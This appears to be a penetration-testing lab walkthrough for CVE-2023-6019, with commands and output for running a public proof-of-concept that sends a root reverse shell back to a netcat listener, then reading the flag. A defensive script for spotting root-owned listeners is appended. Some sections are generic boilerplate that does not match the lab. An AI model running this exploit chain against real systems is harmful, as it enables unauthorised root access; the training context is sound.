Proving Grounds - CVE-2023-6019 (Linux)
Proving Grounds CVE-2023-6019 Linux walkthrough covering reconnaissance, initial access, and privilege escalation.
Overview
| Field | Value |
|---|---|
| OS | Linux |
| Difficulty | Not specified |
| Attack Surface | Web application and exposed network services |
| Primary Entry Vector | Web RCE (CVE-2023-6019) |
| Privilege Escalation Path | Local enumeration -> misconfiguration abuse -> root |
Credentials
No credentials obtained.
Reconnaissance
💡 Why this works
This stage maps the reachable attack surface and identifies where exploitation is most likely to succeed. Accurate service and content discovery reduces blind testing and drives targeted follow-up actions.
Initial Foothold
The first attempt is to recover an exposed Git repository from the web service on port 44217 with git-dumper. The request for /.git/HEAD returns HTTP 200, but the body is not a valid Git HEAD file, so git-dumper aborts and there is no repository to dump.
```bash
python3 /tools/git-dumper/git_dumper.py http://192.168.205.37:44217/.git/ /home/n0z0/work/04.OSCP/Proving_Ground/CVE-2023-6019
```

```text
✅[3:01][CPU:5][MEM:79][TUN0:192.168.45.244][...ving_Ground/CVE-2023-6019]
🐉 > python3 /tools/git-dumper/git_dumper.py http://192.168.205.37:44217/.git/ /home/n0z0/work/04.OSCP/Proving_Ground/CVE-2023-6019
/tools/git-dumper/git_dumper.py:409: SyntaxWarning: invalid escape sequence '\g'
modified_content = re.sub(UNSAFE, '# \g<0>', content, flags=re.IGNORECASE)
Warning: Destination '/home/n0z0/work/04.OSCP/Proving_Ground/CVE-2023-6019' is not empty
[-] Testing http://192.168.205.37:44217/.git/HEAD [200]
error: http://192.168.205.37:44217/.git/HEAD is not a git HEAD file
```
💡 Why this works
The initial access step chains discovered weaknesses into executable control over the target. Successful foothold techniques are validated by command execution or interactive shell callbacks.
Privilege Escalation
Next, a public proof-of-concept exploit for CVE-2023-6019 is cloned from GitHub.
```bash
git clone https://github.com/Clydeston/CVE-2023-6019.git
```

```text
❌[3:37][CPU:1][MEM:76][TUN0:192.168.45.244][...ving_Ground/CVE-2023-6019]
🐉 > git clone https://github.com/Clydeston/CVE-2023-6019.git
Cloning into 'CVE-2023-6019'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (6/6), done.
remote: Compressing objects: 100% (5/5), done.
remote: Total 6 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (6/6), done.
```
The PoC is then run against the service on port 9000. Here -t and -p give the target host and port (192.168.205.37:9000), and -l and -lp give the address and port of the listener that receives the callback (192.168.45.244:80).
```bash
python3 CVE-2023-6019.py -t 192.168.205.37 -p 9000 -l 192.168.45.244 -lp 80
```

```text
✅[4:22][CPU:51][MEM:75][TUN0:192.168.45.244][...E-2023-6019/CVE-2023-6019]
🐉 > python3 CVE-2023-6019.py -t 192.168.205.37 -p 9000 -l 192.168.45.244 -lp 80
Sending Payload
```
A netcat listener on port 80, wrapped in rlwrap for line editing, receives the callback. The shell arrives as root in /opt, and proof.txt is read from root's home directory.
```bash
rlwrap -cAri nc -lvnp 80
ls
ls -la
cat proof.txt
```

```text
❌[4:22][CPU:58][MEM:71][TUN0:192.168.45.244][/home/n0z0]
🐉 > rlwrap -cAri nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.244] from (UNKNOWN) [192.168.205.37] 41146
root@ubuntu:/opt# ls
ls
server-ml.py
root@ubuntu:/opt# ls -la
ls -la
total 12
drwxr-xr-x 2 root root 4096 Dec 16 2023 .
drwxr-xr-x 19 root root 4096 Jun 15 2022 ..
-rw-r--r-- 1 root root 1324 Dec 16 2023 server-ml.py
root@ubuntu:~# cat proof.txt
cat proof.txt
bfe6ff4e77c09176e9a93c2086a4a12a
root@ubuntu:~#
```
💡 Why this works
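Privilege escalation relies on local misconfigurations, unsafe permissions, and trusted execution paths. Enumerating and abusing these trust boundaries is the fastest route to root-level access. On this target no separate escalation step was needed: the shell returned by the exploit was already root (note the root@ubuntu prompt), so the exploited service itself was running with root privileges.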
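The root prompt in the session above shows that the service reached by the exploit was running as uid 0, which is why code execution meant immediate root. The following added example (not part of the original walkthrough) audits a host for that condition by parsing /proc/net/tcp for non-loopback listening sockets owned by root; the sample table is constructed and the function names are illustrative.

```python
import ipaddress
import socket
import struct

# Constructed sample in /proc/net/tcp layout (not captured from the lab host).
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:2328 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 20511 1 0000000000000000 100 0 0 10 0
   1: 00000000:ACB9 00000000:0000 0A 00000000:00000000 00:00000000 00000000    33        0 20987 1 0000000000000000 100 0 0 10 0
   2: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 21444 1 0000000000000000 100 0 0 10 0
   3: 25CDA8C0:2328 F42DA8C0:A0BA 01 00000000:00000000 00:00000000 00000000     0        0 22790 1 0000000000000000 20 4 30 10 -1
"""

LISTEN = "0A"  # TCP_LISTEN in the kernel's socket state enum


def decode_ipv4(hex_addr: str) -> ipaddress.IPv4Address:
    """Decode the hex address column; assumes a little-endian host (x86, ARM)."""
    return ipaddress.IPv4Address(socket.inet_ntoa(struct.pack("<I", int(hex_addr, 16))))


def root_listeners(proc_net_tcp: str) -> list[tuple[str, int, int]]:
    """Return (ip, port, inode) for non-loopback LISTEN sockets owned by uid 0."""
    findings = []
    for line in proc_net_tcp.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 10:
            continue
        addr_hex, port_hex = fields[1].split(":")
        state, uid, inode = fields[3], int(fields[7]), int(fields[9])
        ip = decode_ipv4(addr_hex)
        if state == LISTEN and uid == 0 and not ip.is_loopback:
            findings.append((str(ip), int(port_hex, 16), inode))
    return findings


if __name__ == "__main__":
    try:  # live table on Linux, constructed sample elsewhere
        with open("/proc/net/tcp") as fh:
            table = fh.read()
    except OSError:
        table = SAMPLE
    for ip, port, inode in root_listeners(table):
        print(f"root-owned listener {ip}:{port} (socket inode {inode})")
```

The uid column records the socket's owner at creation, so a daemon that binds as root and then drops privileges is still listed; confirm against the process's current uid. IPv6 listeners live in /proc/net/tcp6 and are not covered here.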
Lessons Learned / Key Takeaways
- Validate framework debug mode and error exposure in production-like environments.
- Restrict file permissions on scripts and binaries executed by privileged users or schedulers.
- Harden sudo policies to avoid wildcard command expansion and scriptable privileged tools.
- Treat exposed credentials and environment files as critical secrets.
References
- CVE-2023-6019: https://nvd.nist.gov/vuln/detail/CVE-2023-6019
- RustScan: https://github.com/RustScan/RustScan
- Nmap: https://nmap.org/
- feroxbuster: https://github.com/epi052/feroxbuster
- Nuclei: https://github.com/projectdiscovery/nuclei
- GTFOBins: https://gtfobins.org/
- HackTricks Privilege Escalation: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html